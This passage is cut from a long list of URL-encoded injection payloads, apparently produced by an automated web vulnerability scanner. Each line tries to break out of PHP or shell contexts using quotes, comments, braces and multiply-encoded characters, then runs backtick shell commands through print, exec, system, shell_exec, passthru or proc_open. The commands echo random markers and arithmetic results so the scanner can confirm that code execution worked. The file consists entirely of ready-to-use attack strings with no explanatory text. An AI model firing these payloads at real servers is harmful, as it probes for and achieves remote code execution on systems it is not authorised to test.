Z`.`echo%20$((55%2B5))`.`echo%20HLTCMZ`.`echo%20HLTCMZ`)%29%7DHLTCMZ\n'.print(`echo%20TSTIED;echo%20$((94%2B6));echo%20TSTIED;echo%20TSTIED`)%3B%2529%257DTSTIED\n'.print(`echo%20PFJGQM%0aecho%20$((86%2B33))%0aecho%20PFJGQM%0aecho%20PFJGQM`)%3B%252529%25257DPFJGQM\n'.print(`echo%20KFTIEO\\necho%20$((9%2B66))\\necho%20KFTIEO\\necho%20KFTIEO`)%3B%25252529%2525257DKFTIEO\n);}print(`echo%20WZOXHV`.`echo%20$((36%2B81))`.`echo%20WZOXHV`.`echo%20WZOXHV`)%3BWZOXHV\n);}print(`echo%20UTBTBN;echo%20$((92%2B40));echo%20UTBTBN;echo%20UTBTBN`)%3BUTBTBN\n);}print(`echo%20KAJDYV%0aecho%20$((71%2B88))%0aecho%20KAJDYV%0aecho%20KAJDYV`)%3BKAJDYV\n);}print(`echo%20PJRPBN\\necho%20$((21%2B16))\\necho%20PJRPBN\\necho%20PJRPBN`)%3BPJRPBN\n);}print(`echo%20KRAWWO`.`echo%20$((15%2B36))`.`echo%20KRAWWO`.`echo%20KRAWWO`)%3B%5C%5CKRAWWO\n);}print(`echo%20JRCPDX;echo%20$((59%2B49));echo%20JRCPDX;echo%20JRCPDX`)%3B%255C%255CJRCPDX\n);}print(`echo%20XMVWXQ%0aecho%20$((48%2B88))%0aecho%20XMVWXQ%0aecho%20XMVWXQ`)%3B%25255C%25255CXMVWXQ\n);}print(`echo%20SWQEIO\\necho%20$((64%2B42))\\necho%20SWQEIO\\necho%20SWQEIO`)%3B%2525255C%2525255CSWQEIO\n);}print(`echo%20MUNABZ`.`echo%20$((46%2B73))`.`echo%20MUNABZ`.`echo%20MUNABZ`)%3B//MUNABZ\n);}print(`echo%20BAPQUZ;echo%20$((9%2B46));echo%20BAPQUZ;echo%20BAPQUZ`)%3B//BAPQUZ\n);}print(`echo%20WVNNUB%0aecho%20$((6%2B67))%0aecho%20WVNNUB%0aecho%20WVNNUB`)%3B//WVNNUB\n);}print(`echo%20KDYDKK\\necho%20$((47%2B87))\\necho%20KDYDKK\\necho%20KDYDKK`)%3B//KDYDKK\n);}print(`echo%20MRPUDM`.`echo%20$((50%2B14))`.`echo%20MRPUDM`.`echo%20MRPUDM`)%3B%23MRPUDM\n);}print(`echo%20BJFECX;echo%20$((21%2B86));echo%20BJFECX;echo%20BJFECX`)%3B%2523BJFECX\n);}print(`echo%20JRFJOE%0aecho%20$((92%2B73))%0aecho%20JRFJOE%0aecho%20JRFJOE`)%3B%252523JRFJOE\n);}print(`echo%20ZXKKBW\\necho%20$((18%2B93))\\necho%20ZXKKBW\\necho%20ZXKKBW`)%3B%25252523ZXKKBW\n);}print(`echo%20DETLEF`.`echo%20$((0%2B62))`.`echo%20DETLEF`.`echo%20DETLEF`)%3B.%22DETLEF\n);}print(`echo%20MSEKQO;echo%20$((87%2B12));echo%20MSEKQO;echo%20MSEKQO`)%3B.%2522MSEKQO\n);}print(`echo%20HXJYZZ%0aecho%20$((70%2B79))%0aecho%20HXJYZZ%0aecho%20HXJYZZ`)%3B.%252522HXJYZZ\n);}print(`echo%20DSHIRJ\\necho%20$((54%2B41))\\necho%20DSHIRJ\\necho%20DSHIRJ`)%3B.%25252522DSHIRJ\n);}print(`echo%20KXLAQH`.`echo%20$((80%2B88))`.`echo%20KXLAQH`.`echo%20KXLAQH`)%3B.%27KXLAQH\n);}print(`echo%20BCMROJ;echo%20$((2%2B69));echo%20BCMROJ;echo%20BCMROJ`)%3B.%2527BCMROJ\n);}print(`echo%20OSKSTF%0aecho%20$((2%2B12))%0aecho%20OSKSTF%0aecho%20OSKSTF`)%3B.%252527OSKSTF\n);}print(`echo%20KBRMCR\\necho%20$((41%2B94))\\necho%20KBRMCR\\necho%20KBRMCR`)%3B.%25252527KBRMCR\n);}print(`echo%20KYGLOF`.`echo%20$((80%2B87))`.`echo%20KYGLOF`.`echo%20KYGLOF`)%29%7DKYGLOF\n);}print(`echo%20JIIHYT;echo%20$((7%2B65));echo%20JIIHYT;echo%20JIIHYT`)%3B%2529%257DJIIHYT\n);}print(`echo%20SCGPHN%0aecho%20$((41%2B99))%0aecho%20SCGPHN%0aecho%20SCGPHN`)%3B%252529%25257DSCGPHN\n);}print(`echo%20KAYVRD\\necho%20$((4%2B54))\\necho%20KAYVRD\\necho%20KAYVRD`)%3B%25252529%2525257DKAYVRD\n');}print(`echo%20YERJDV`.`echo%20$((3%2B37))`.`echo%20YERJDV`.`echo%20YERJDV`)%3BYERJDV\n');}print(`echo%20RNSTSU;echo%20$((52%2B2));echo%20RNSTSU;echo%20RNSTSU`)%3BRNSTSU\n');}print(`echo%20EKPEWV%0aecho%20$((50%2B69))%0aecho%20EKPEWV%0aecho%20EKPEWV`)%3BEKPEWV\n');}print(`echo%20BHUVJI\\necho%20$((10%2B13))\\necho%20BHUVJI\\necho%20BHUVJI`)%3BBHUVJI\n');}print(`echo%20TBZBGJ`.`echo%20$((58%2B75))`.`echo%20TBZBGJ`.`echo%20TBZBGJ`)%3B%5C%5CTBZBGJ\n');}print(`echo%20NPFNRM;echo%20$((91%2B52));echo%20NPFNRM;echo%20NPFNRM`)%3B%255C%255CNPFNRM\n');}print(`echo%20HDWSHN%0aecho%20$((40%2B78))%0aecho%20HDWSHN%0aecho%20HDWSHN`)%3B%25255C%25255CHDWSHN\n');}print(`echo%20FOGQPM\\necho%20$((27%2B12))\\necho%20FOGQPM\\necho%20FOGQPM`)%3B%2525255C%2525255CFOGQPM\n');}print(`echo%20XREPUI`.`echo%20$((55%2B99))`.`echo%20XREPUI`.`echo%20XREPUI`)%3B//XREPUI\n');}print(`echo%20GVZZMK;echo%20$((1%2B62));echo%20GVZZMK;echo%20GVZZMK`)%3B//GVZZMK\n');}print(`echo%20VBLUSZ%0aecho%20$((96%2B95))%0aecho%20VBLUSZ%0aecho%20VBLUSZ`)%3B//VBLUSZ\n');}print(`echo%20EVHTLK\\necho%20$((99%2B40))\\necho%20EVHTLK\\necho%20EVHTLK`)%3B//EVHTLK\n');}print(`echo%20URYEKO`.`echo%20$((45%2B57))`.`echo%20URYEKO`.`echo%20URYEKO`)%3B%23URYEKO\n');}print(`echo%20BQJSKG;echo%20$((72%2B76));echo%20BQJSKG;echo%20BQJSKG`)%3B%2523BQJSKG\n');}print(`echo%20IMZVGR%0aecho%20$((80%2B38))%0aecho%20IMZVGR%0aecho%20IMZVGR`)%3B%252523IMZVGR\n');}print(`echo%20MMQDEE\\necho%20$((77%2B28))\\necho%20MMQDEE\\necho%20MMQDEE`)%3B%25252523MMQDEE\n');}print(`echo%20HDQYRP`.`echo%20$((43%2B86))`.`echo%20HDQYRP`.`echo%20HDQYRP`)%3B.%22HDQYRP\n');}print(`echo%20JDHUOY;echo%20$((0%2B32));echo%20JDHUOY;echo%20JDHUOY`)%3B.%2522JDHUOY\n');}print(`echo%20GKLRKU%0aecho%20$((97%2B77))%0aecho%20GKLRKU%0aecho%20GKLRKU`)%3B.%252522GKLRKU\n');}print(`echo%20UXXDJD\\necho%20$((17%2B17))\\necho%20UXXDJD\\necho%20UXXDJD`)%3B.%25252522UXXDJD\n');}print(`echo%20HEGGJN`.`echo%20$((68%2B69))`.`echo%20HEGGJN`.`echo%20HEGGJN`)%3B.%27HEGGJN\n');}print(`echo%20YXZEEF;echo%20$((79%2B80));echo%20YXZEEF;echo%20YXZEEF`)%3B.%2527YXZEEF\n');}print(`echo%20TJELNR%0aecho%20$((81%2B0))%0aecho%20TJELNR%0aecho%20TJELNR`)%3B.%252527TJELNR\n');}print(`echo%20IFVTUZ\\necho%20$((51%2B31))\\necho%20IFVTUZ\\necho%20IFVTUZ`)%3B.%25252527IFVTUZ\n');}print(`echo%20SVXVYZ`.`echo%20$((35%2B1))`.`echo%20SVXVYZ`.`echo%20SVXVYZ`)%29%7DSVXVYZ\n');}print(`echo%20TFOYWK;echo%20$((13%2B51));echo%20TFOYWK;echo%20TFOYWK`)%3B%2529%257DTFOYWK\n');}print(`echo%20IXTNVY%0aecho%20$((8%2B16))%0aecho%20IXTNVY%0aecho%20IXTNVY`)%3B%252529%25257DIXTNVY\n');}print(`echo%20DEXNOX\\necho%20$((69%2B36))\\necho%20DEXNOX\\necho%20DEXNOX`)%3B%25252529%2525257DDEXNOX\n\");}print(`echo%20NAAXBX`.`echo%20$((38%2B13))`.`echo%20NAAXBX`.`echo%20NAAXBX`)%3BNAAXBX\n\");}print(`echo%20TWEYRU;echo%20$((57%2B60));echo%20TWEYRU;echo%20TWEYRU`)%3BTWEYRU\n\");}print(`echo%20WCABAY%0aecho%20$((46%2B3))%0aecho%20WCABAY%0aecho%20WCABAY`)%3BWCABAY\n\");}print(`echo%20XYXNLP\\necho%20$((64%2B13))\\necho%20XYXNLP\\necho%20XYXNLP`)%3BXYXNLP\n\");}print(`echo%20QHWLWM`.`echo%20$((41%2B28))`.`echo%20QHWLWM`.`echo%20QHWLWM`)%3B%5C%5CQHWLWM\n\");}print(`echo%20WQBRFD;echo%20$((85%2B53));echo%20WQBRFD;echo%20WQBRFD`)%3B%255C%255CWQBRFD\n\");}print(`echo%20HWAGVJ%0aecho%20$((14%2B22))%0aecho%20HWAGVJ%0aecho%20HWAGVJ`)%3B%25255C%25255CHWAGVJ\n\");}print(`echo%20XILSBL\\necho%20$((74%2B71))\\necho%20XILSBL\\necho%20XILSBL`)%3B%2525255C%2525255CXILSBL\n\");}print(`echo%20KHRTRY`.`echo%20$((68%2B68))`.`echo%20KHRTRY`.`echo%20KHRTRY`)%3B//KHRTRY\n\");}print(`echo%20YDWEZS;echo%20$((87%2B70));echo%20YDWEZS;echo%20YDWEZS`)%3B//YDWEZS\n\");}print(`echo%20JFBZLZ%0aecho%20$((64%2B83))%0aecho%20JFBZLZ%0aecho%20JFBZLZ`)%3B//JFBZLZ\n\");}print(`echo%20UTFROF\\necho%20$((67%2B6))\\necho%20UTFROF\\necho%20UTFROF`)%3B//UTFROF\n\");}print(`echo%20RACXOI`.`echo%20$((81%2B11))`.`echo%20RACXOI`.`echo%20RACXOI`)%3B%23RACXOI\n\");}print(`echo%20DKLYZK;echo%20$((5%2B95));echo%20DKLYZK;echo%20DKLYZK`)%3B%2523DKLYZK\n\");}print(`echo%20YSGCAB%0aecho%20$((76%2B3))%0aecho%20YSGCAB%0aecho%20YSGCAB`)%3B%252523YSGCAB\n\");}print(`echo%20CKSIUK\\necho%20$((45%2B4))\\necho%20CKSIUK\\necho%20CKSIUK`)%3B%25252523CKSIUK\n\");}print(`echo%20LVFGXD`.`echo%20$((25%2B23))`.`echo%20LVFGXD`.`echo%20LVFGXD`)%3B.%22LVFGXD\n\");}print(`echo%20IBFQKH;echo%20$((32%2B31));echo%20IBFQKH;echo%20IBFQKH`)%3B.%2522IBFQKH\n\");}print(`echo%20MPXDZZ%0aecho%20$((78%2B91))%0aecho%20MPXDZZ%0aecho%20MPXDZZ`)%3B.%252522MPXDZZ\n\");}print(`echo%20GHISCR\\necho%20$((96%2B53))\\necho%20GHISCR\\necho%20GHISCR`)%3B.%25252522GHISCR\n\");}print(`echo%20UHQKLI`.`echo%20$((50%2B4))`.`echo%20UHQKLI`.`echo%20UHQKLI`)%3B.%27UHQKLI\n\");}print(`echo%20MDITEG;echo%20$((51%2B68));echo%20MDITEG;echo%20MDITEG`)%3B.%2527MDITEG\n\");}print(`echo%20RKXNWH%0aecho%20$((63%2B75))%0aecho%20RKXNWH%0aecho%20RKXNWH`)%3B.%252527RKXNWH\n\");}print(`echo%20RXUKTF\\necho%20$((42%2B2))\\necho%20RXUKTF\\necho%20RXUKTF`)%3B.%25252527RXUKTF\n\");}print(`echo%20TCCEGQ`.`echo%20$((87%2B34))`.`echo%20TCCEGQ`.`echo%20TCCEGQ`)%29%7DTCCEGQ\n\");}print(`echo%20NUVVKA;echo%20$((27%2B5));echo%20NUVVKA;echo%20NUVVKA`)%3B%2529%257DNUVVKA\n\");}print(`echo%20QNFOEE%0aecho%20$((91%2B41))%0aecho%20QNFOEE%0aecho%20QNFOEE`)%3B%252529%25257DQNFOEE\n\");}print(`echo%20SFBDLE\\necho%20$((73%2B49))\\necho%20SFBDLE\\necho%20SFBDLE`)%3B%25252529%2525257DSFBDLE\n${exec(print(`echo%20HIUMZJ`.`echo%20$((69%2B37))`.`echo%20HIUMZJ`.`echo%20HIUMZJ`)%3BHIUMZJ\n${exec(print(`echo%20BDBPSZ;echo%20$((87%2B50));echo%20BDBPSZ;echo%20BDBPSZ`)%3BBDBPSZ\n${exec(print(`echo%20UVBBNB%0aecho%20$((5%2B32))%0aecho%20UVBBNB%0aecho%20UVBBNB`)%3BUVBBNB\n${exec(print(`echo%20ITAGSP\\necho%20$((63%2B35))\\necho%20ITAGSP\\necho%20ITAGSP`)%3BITAGSP\n${exec(print(`echo%20JFZDGZ`.`echo%20$((16%2B38))`.`echo%20JFZDGZ`.`echo%20JFZDGZ`)%3B%5C%5CJFZDGZ\n${exec(print(`echo%20YYMYQB;echo%20$((54%2B65));echo%20YYMYQB;echo%20YYMYQB`)%3B%255C%255CYYMYQB\n${exec(print(`echo%20QTLCRD%0aecho%20$((90%2B5))%0aecho%20QTLCRD%0aecho%20QTLCRD`)%3B%25255C%25255CQTLCRD\n${exec(print(`echo%20QRLVMM\\necho%20$((41%2B19))\\necho%20QRLVMM\\necho%20QRLVMM`)%3B%2525255C%2525255CQRLVMM\n${exec(print(`echo%20XRESBN`.`echo%20$((9%2B10))`.`echo%20XRESBN`.`echo%20XRESBN`)%3B//XRESBN\n${exec(print(`echo%20YFVAOJ;echo%20$((71%2B65));echo%20YFVAOJ;echo%20YFVAOJ`)%3B//YFVAOJ\n${exec(print(`echo%20CPYIZR%0aecho%20$((58%2B63))%0aecho%20CPYIZR%0aecho%20CPYIZR`)%3B//CPYIZR\n${exec(print(`echo%20UFJNMU\\necho%20$((69%2B30))\\necho%20UFJNMU\\necho%20UFJNMU`)%3B//UFJNMU\n${exec(print(`echo%20GKZRWD`.`echo%20$((93%2B76))`.`echo%20GKZRWD`.`echo%20GKZRWD`)%3B%23GKZRWD\n${exec(print(`echo%20ASBMQM;echo%20$((65%2B46));echo%20ASBMQM;echo%20ASBMQM`)%3B%2523ASBMQM\n${exec(print(`echo%20UZNHTA%0aecho%20$((79%2B41))%0aecho%20UZNHTA%0aecho%20UZNHTA`)%3B%252523UZNHTA\n${exec(print(`echo%20TWZNTZ\\necho%20$((85%2B67))\\necho%20TWZNTZ\\necho%20TWZNTZ`)%3B%25252523TWZNTZ\n${exec(print(`echo%20BGHSSE`.`echo%20$((10%2B79))`.`echo%20BGHSSE`.`echo%20BGHSSE`)%3B.%22BGHSSE\n${exec(print(`echo%20GYABGY;echo%20$((9%2B52));echo%20GYABGY;echo%20GYABGY`)%3B.%2522GYABGY\n${exec(print(`echo%20HFMDNB%0aecho%20$((56%2B41))%0aecho%20HFMDNB%0aecho%20HFMDNB`)%3B.%252522HFMDNB\n${exec(print(`echo%20KTGGNJ\\necho%20$((80%2B87))\\necho%20KTGGNJ\\necho%20KTGGNJ`)%3B.%25252522KTGGNJ\n${exec(print(`echo%20UGDXMC`.`echo%20$((12%2B69))`.`echo%20UGDXMC`.`echo%20UGDXMC`)%3B.%27UGDXMC\n${exec(print(`echo%20CHWXXR;echo%20$((19%2B13));echo%20CHWXXR;echo%20CHWXXR`)%3B.%2527CHWXXR\n${exec(print(`echo%20OHFTIA%0aecho%20$((97%2B31))%0aecho%20OHFTIA%0aecho%20OHFTIA`)%3B.%252527OHFTIA\n${exec(print(`echo%20JPKQMC\\necho%20$((63%2B12))\\necho%20JPKQMC\\necho%20JPKQMC`)%3B.%25252527JPKQMC\n${exec(print(`echo%20SRPMSX`.`echo%20$((59%2B33))`.`echo%20SRPMSX`.`echo%20SRPMSX`)%29%7DSRPMSX\n${exec(print(`echo%20IHGVIP;echo%20$((98%2B57));echo%20IHGVIP;echo%20IHGVIP`)%3B%2529%257DIHGVIP\n${exec(print(`echo%20LWNHYJ%0aecho%20$((0%2B21))%0aecho%20LWNHYJ%0aecho%20LWNHYJ`)%3B%252529%25257DLWNHYJ\n${exec(print(`echo%20AOJPQW\\necho%20$((18%2B92))\\necho%20AOJPQW\\necho%20AOJPQW`)%3B%25252529%2525257DAOJPQW\n${system(print(`echo%20QIHVTW`.`echo%20$((76%2B48))`.`echo%20QIHVTW`.`echo%20QIHVTW`)%3BQIHVTW\n${system(print(`echo%20YVOAMZ;echo%20$((9%2B69));echo%20YVOAMZ;echo%20YVOAMZ`)%3BYVOAMZ\n${system(print(`echo%20EDIEDW%0aecho%20$((27%2B90))%0aecho%20EDIEDW%0aecho%20EDIEDW`)%3BEDIEDW\n${system(print(`echo%20CTDUTJ\\necho%20$((30%2B48))\\necho%20CTDUTJ\\necho%20CTDUTJ`)%3BCTDUTJ\n${system(print(`echo%20CPHTNC`.`echo%20$((73%2B50))`.`echo%20CPHTNC`.`echo%20CPHTNC`)%3B%5C%5CCPHTNC\n${system(print(`echo%20GVUXPA;echo%20$((23%2B14));echo%20GVUXPA;echo%20GVUXPA`)%3B%255C%255CGVUXPA\n${system(print(`echo%20YHCDBT%0aecho%20$((19%2B19))%0aecho%20YHCDBT%0aecho%20YHCDBT`)%3B%25255C%25255CYHCDBT\n${system(print(`echo%20LHBYTT\\necho%20$((48%2B0))\\necho%20LHBYTT\\necho%20LHBYTT`)%3B%2525255C%2525255CLHBYTT\n${system(print(`echo%20JJXLFR`.`echo%20$((84%2B45))`.`echo%20JJXLFR`.`echo%20JJXLFR`)%3B//JJXLFR\n${system(print(`echo%20QXZKBZ;echo%20$((59%2B25));echo%20QXZKBZ;echo%20QXZKBZ`)%3B//QXZKBZ\n${system(print(`echo%20MAFXYF%0aecho%20$((23%2B63))%0aecho%20MAFXYF%0aecho%20MAFXYF`)%3B//MAFXYF\n${system(print(`echo%20LXHYXF\\necho%20$((50%2B90))\\necho%20LXHYXF\\necho%20LXHYXF`)%3B//LXHYXF\n${system(print(`echo%20XPECBV`.`echo%20$((14%2B77))`.`echo%20XPECBV`.`echo%20XPECBV`)%3B%23XPECBV\n${system(print(`echo%20LWTWCT;echo%20$((98%2B35));echo%20LWTWCT;echo%20LWTWCT`)%3B%2523LWTWCT\n${system(print(`echo%20RSGSZK%0aecho%20$((0%2B7))%0aecho%20RSGSZK%0aecho%20RSGSZK`)%3B%252523RSGSZK\n${system(print(`echo%20MQQJPG\\necho%20$((72%2B19))\\necho%20MQQJPG\\necho%20MQQJPG`)%3B%25252523MQQJPG\n${system(print(`echo%20WJAMJI`.`echo%20$((95%2B52))`.`echo%20WJAMJI`.`echo%20WJAMJI`)%3B.%22WJAMJI\n${system(print(`echo%20ARCVVC;echo%20$((7%2B90));echo%20ARCVVC;echo%20ARCVVC`)%3B.%2522ARCVVC\n${system(print(`echo%20CKLWBH%0aecho%20$((38%2B7))%0aecho%20CKLWBH%0aecho%20CKLWBH`)%3B.%252522CKLWBH\n${system(print(`echo%20CZASPT\\necho%20$((18%2B64))\\necho%20CZASPT\\necho%20CZASPT`)%3B.%25252522CZASPT\n${system(print(`echo%20TDEKPW`.`echo%20$((36%2B67))`.`echo%20TDEKPW`.`echo%20TDEKPW`)%3B.%27TDEKPW\n${system(print(`echo%20FTPLBI;echo%20$((56%2B37));echo%20FTPLBI;echo%20FTPLBI`)%3B.%2527FTPLBI\n${system(print(`echo%20RKLPMM%0aecho%20$((66%2B91))%0aecho%20RKLPMM%0aecho%20RKLPMM`)%3B.%252527RKLPMM\n${system(print(`echo%20IWAAGD\\necho%20$((70%2B17))\\necho%20IWAAGD\\necho%20IWAAGD`)%3B.%25252527IWAAGD\n${system(print(`echo%20ZYLUET`.`echo%20$((5%2B56))`.`echo%20ZYLUET`.`echo%20ZYLUET`)%29%7DZYLUET\n${system(print(`echo%20EZFNSE;echo%20$((38%2B74));echo%20EZFNSE;echo%20EZFNSE`)%3B%2529%257DEZFNSE\n${system(print(`echo%20DDVDPM%0aecho%20$((1%2B17))%0aecho%20DDVDPM%0aecho%20DDVDPM`)%3B%252529%25257DDDVDPM\n${system(print(`echo%20YYSFAL\\necho%20$((70%2B5))\\necho%20YYSFAL\\necho%20YYSFAL`)%3B%25252529%2525257DYYSFAL\n${shell_exec(print(`echo%20FDGAHQ`.`echo%20$((87%2B87))`.`echo%20FDGAHQ`.`echo%20FDGAHQ`)%3BFDGAHQ\n${shell_exec(print(`echo%20OAPDKW;echo%20$((19%2B47));echo%20OAPDKW;echo%20OAPDKW`)%3BOAPDKW\n${shell_exec(print(`echo%20NTILFZ%0aecho%20$((24%2B1))%0aecho%20NTILFZ%0aecho%20NTILFZ`)%3BNTILFZ\n${shell_exec(print(`echo%20LTJDND\\necho%20$((85%2B41))\\necho%20LTJDND\\necho%20LTJDND`)%3BLTJDND\n${shell_exec(print(`echo%20NSLPBW`.`echo%20$((95%2B54))`.`echo%20NSLPBW`.`echo%20NSLPBW`)%3B%5C%5CNSLPBW\n${shell_exec(print(`echo%20MVSQEI;echo%20$((38%2B17));echo%20MVSQEI;echo%20MVSQEI`)%3B%255C%255CMVSQEI\n${shell_exec(print(`echo%20VZXASO%0aecho%20$((97%2B88))%0aecho%20VZXASO%0aecho%20VZXASO`)%3B%25255C%25255CVZXASO\n${shell_exec(print(`echo%20KRLQHL\\necho%20$((37%2B53))\\necho%20KRLQHL\\necho%20KRLQHL`)%3B%2525255C%2525255CKRLQHL\n${shell_exec(print(`echo%20CTGKDZ`.`echo%20$((66%2B54))`.`echo%20CTGKDZ`.`echo%20CTGKDZ`)%3B//CTGKDZ\n${shell_exec(print(`echo%20EDDLOS;echo%20$((48%2B73));echo%20EDDLOS;echo%20EDDLOS`)%3B//EDDLOS\n${shell_exec(print(`echo%20HULCYO%0aecho%20$((33%2B24))%0aecho%20HULCYO%0aecho%20HULCYO`)%3B//HULCYO\n${shell_exec(print(`echo%20CVXUUB\\necho%20$((15%2B41))\\necho%20CVXUUB\\necho%20CVXUUB`)%3B//CVXUUB\n${shell_exec(print(`echo%20SICOKB`.`echo%20$((59%2B30))`.`echo%20SICOKB`.`echo%20SICOKB`)%3B%23SICOKB\n${shell_exec(print(`echo%20EINNUI;echo%20$((9%2B15));echo%20EINNUI;echo%20EINNUI`)%3B%2523EINNUI\n${shell_exec(print(`echo%20FBJSWR%0aecho%20$((91%2B71))%0aecho%20FBJSWR%0aecho%20FBJSWR`)%3B%252523FBJSWR\n${shell_exec(print(`echo%20QQZSXU\\necho%20$((69%2B44))\\necho%20QQZSXU\\necho%20QQZSXU`)%3B%25252523QQZSXU\n${shell_exec(print(`echo%20ZEVNBY`.`echo%20$((97%2B49))`.`echo%20ZEVNBY`.`echo%20ZEVNBY`)%3B.%22ZEVNBY\n${shell_exec(print(`echo%20WBZBZE;echo%20$((19%2B87));echo%20WBZBZE;echo%20WBZBZE`)%3B.%2522WBZBZE\n${shell_exec(print(`echo%20KIACLJ%0aecho%20$((8%2B79))%0aecho%20KIACLJ%0aecho%20KIACLJ`)%3B.%252522KIACLJ\n${shell_exec(print(`echo%20NHQIAE\\necho%20$((63%2B50))\\necho%20NHQIAE\\necho%20NHQIAE`)%3B.%25252522NHQIAE\n${shell_exec(print(`echo%20CKFBET`.`echo%20$((33%2B76))`.`echo%20CKFBET`.`echo%20CKFBET`)%3B.%27CKFBET\n${shell_exec(print(`echo%20BMQBVJ;echo%20$((82%2B52));echo%20BMQBVJ;echo%20BMQBVJ`)%3B.%2527BMQBVJ\n${shell_exec(print(`echo%20VEKGIY%0aecho%20$((15%2B47))%0aecho%20VEKGIY%0aecho%20VEKGIY`)%3B.%252527VEKGIY\n${shell_exec(print(`echo%20VBRHZS\\necho%20$((17%2B48))\\necho%20VBRHZS\\necho%20VBRHZS`)%3B.%25252527VBRHZS\n${shell_exec(print(`echo%20PWWUEN`.`echo%20$((49%2B57))`.`echo%20PWWUEN`.`echo%20PWWUEN`)%29%7DPWWUEN\n${shell_exec(print(`echo%20OYNPCP;echo%20$((84%2B51));echo%20OYNPCP;echo%20OYNPCP`)%3B%2529%257DOYNPCP\n${shell_exec(print(`echo%20DPVESG%0aecho%20$((76%2B66))%0aecho%20DPVESG%0aecho%20DPVESG`)%3B%252529%25257DDPVESG\n${shell_exec(print(`echo%20RJFPQU\\necho%20$((15%2B60))\\necho%20RJFPQU\\necho%20RJFPQU`)%3B%25252529%2525257DRJFPQU\n${passthru(print(`echo%20NLYULT`.`echo%20$((55%2B80))`.`echo%20NLYULT`.`echo%20NLYULT`)%3BNLYULT\n${passthru(print(`echo%20CLQQRV;echo%20$((21%2B24));echo%20CLQQRV;echo%20CLQQRV`)%3BCLQQRV\n${passthru(print(`echo%20TYDNLL%0aecho%20$((23%2B29))%0aecho%20TYDNLL%0aecho%20TYDNLL`)%3BTYDNLL\n${passthru(print(`echo%20ZKPFXS\\necho%20$((3%2B17))\\necho%20ZKPFXS\\necho%20ZKPFXS`)%3BZKPFXS\n${passthru(print(`echo%20CGIUOF`.`echo%20$((1%2B49))`.`echo%20CGIUOF`.`echo%20CGIUOF`)%3B%5C%5CCGIUOF\n${passthru(print(`echo%20JRXXWA;echo%20$((92%2B68));echo%20JRXXWA;echo%20JRXXWA`)%3B%255C%255CJRXXWA\n${passthru(print(`echo%20KXVPHA%0aecho%20$((20%2B43))%0aecho%20KXVPHA%0aecho%20KXVPHA`)%3B%25255C%25255CKXVPHA\n${passthru(print(`echo%20OLJESC\\necho%20$((53%2B40))\\necho%20OLJESC\\necho%20OLJESC`)%3B%2525255C%2525255COLJESC\n${passthru(print(`echo%20XGEVDG`.`echo%20$((58%2B30))`.`echo%20XGEVDG`.`echo%20XGEVDG`)%3B//XGEVDG\n${passthru(print(`echo%20DBDIBN;echo%20$((7%2B5));echo%20DBDIBN;echo%20DBDIBN`)%3B//DBDIBN\n${passthru(print(`echo%20NSBWMT%0aecho%20$((16%2B44))%0aecho%20NSBWMT%0aecho%20NSBWMT`)%3B//NSBWMT\n${passthru(print(`echo%20EWDATZ\\necho%20$((58%2B44))\\necho%20EWDATZ\\necho%20EWDATZ`)%3B//EWDATZ\n${passthru(print(`echo%20OAAISJ`.`echo%20$((72%2B52))`.`echo%20OAAISJ`.`echo%20OAAISJ`)%3B%23OAAISJ\n${passthru(print(`echo%20PYELUB;echo%20$((29%2B64));echo%20PYELUB;echo%20PYELUB`)%3B%2523PYELUB\n${passthru(print(`echo%20FHTLVG%0aecho%20$((8%2B87))%0aecho%20FHTLVG%0aecho%20FHTLVG`)%3B%252523FHTLVG\n${passthru(print(`echo%20QPYRBQ\\necho%20$((35%2B79))\\necho%20QPYRBQ\\necho%20QPYRBQ`)%3B%25252523QPYRBQ\n${passthru(print(`echo%20UOUNQT`.`echo%20$((2%2B66))`.`echo%20UOUNQT`.`echo%20UOUNQT`)%3B.%22UOUNQT\n${passthru(print(`echo%20HRCXNG;echo%20$((6%2B10));echo%20HRCXNG;echo%20HRCXNG`)%3B.%2522HRCXNG\n${passthru(print(`echo%20KRUYIM%0aecho%20$((16%2B77))%0aecho%20KRUYIM%0aecho%20KRUYIM`)%3B.%252522KRUYIM\n${passthru(print(`echo%20CSYNWP\\necho%20$((93%2B10))\\necho%20CSYNWP\\necho%20CSYNWP`)%3B.%25252522CSYNWP\n${passthru(print(`echo%20RBCHID`.`echo%20$((71%2B83))`.`echo%20RBCHID`.`echo%20RBCHID`)%3B.%27RBCHID\n${passthru(print(`echo%20XUWNEP;echo%20$((61%2B20));echo%20XUWNEP;echo%20XUWNEP`)%3B.%2527XUWNEP\n${passthru(print(`echo%20QKCAAG%0aecho%20$((61%2B22))%0aecho%20QKCAAG%0aecho%20QKCAAG`)%3B.%252527QKCAAG\n${passthru(print(`echo%20EGTRQH\\necho%20$((17%2B5))\\necho%20EGTRQH\\necho%20EGTRQH`)%3B.%25252527EGTRQH\n${passthru(print(`echo%20DAORGO`.`echo%20$((65%2B75))`.`echo%20DAORGO`.`echo%20DAORGO`)%29%7DDAORGO\n${passthru(print(`echo%20CYGOXX;echo%20$((41%2B31));echo%20CYGOXX;echo%20CYGOXX`)%3B%2529%257DCYGOXX\n${passthru(print(`echo%20OSWWFT%0aecho%20$((92%2B42))%0aecho%20OSWWFT%0aecho%20OSWWFT`)%3B%252529%25257DOSWWFT\n${passthru(print(`echo%20OVSNXT\\necho%20$((21%2B17))\\necho%20OVSNXT\\necho%20OVSNXT`)%3B%25252529%2525257DOVSNXT\n${proc_open(print(`echo%20TIYJYD`.`echo%20$((86%2B26))`.`echo%20TIYJYD`.`echo%20TIYJYD`)%3BTIYJYD\n${proc_open(print(`echo%20XAKQYF;echo%20$((41%2B51));echo%20XAKQYF;echo%20XAKQYF`)%3BXAKQYF\n${proc_open(print(`echo%20WMSMFM%0aecho%20$((4%2B30))%0aecho%20WMSMFM%0aecho%20WMSMFM`)%3BWMSMFM\n${proc_open(print(`echo%20FCANMP\\necho%20$((61%2B35))\\necho%20FCANMP\\necho%20FCANMP`)%3BFCANMP\n${proc_open(print(`echo%20BUFRZN`.`echo%20$((99%2B37))`.`echo%20BUFRZN`.`echo%20BUFRZN`)%3B%5C%5CBUFRZN\n${proc_open(print(`echo%20SKXDUS;echo%20$((67%2B97));echo%20SKXDUS;echo%20SKXDUS`)%3B%255C%255CSKXDUS\n${proc_open(print(`echo%20SQZPMJ%0aecho%20$((94%2B63))%0aecho%20SQZPMJ%0aecho%20SQZPMJ`)%3B%25255C%25255CSQZPMJ\n${proc_open(print(`echo%20ZMUKGP\\necho%20$((9%2B61))\\necho%20ZMUKGP\\necho%20ZMUKGP`)%3B%2525255C%2525255CZMUKGP\n${proc_open(print(`echo%20KDOEOK`.`echo%20$((74%2B18))`.`echo%20KD